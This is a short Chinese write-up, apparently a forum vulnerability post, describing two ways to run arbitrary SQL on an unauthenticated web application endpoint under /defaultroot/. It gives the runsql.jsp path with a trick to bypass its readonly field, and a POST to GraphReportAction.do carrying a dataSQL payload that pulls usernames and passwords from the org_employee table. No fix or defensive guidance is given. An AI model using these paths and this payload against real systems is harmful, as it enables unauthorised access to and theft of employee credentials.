存在两种利用方式
1. `defaultroot/graphreport/runsql.jsp`
这个页面可以直接访问,并且可以执行任意sql语句,页面中textarea域是readonly,使用 firebug 去掉即可,然后就可以执行任意 sql 语句。


可以看到成功执行了sql语句
2.
可以直接给处理类提交数据
通过以下这个链接
```
/defaultroot/GraphReportAction.do?action=showResult
```
然后通过hackbar来吧以下数据post过去即可看到执行的数据
```
dataSQL=select USERPASSWORD,EMP_ID,EMPNAME,USERACCOUNTS from org_employee
```
可以看到sql语句成功的执行了

全部评论 (1)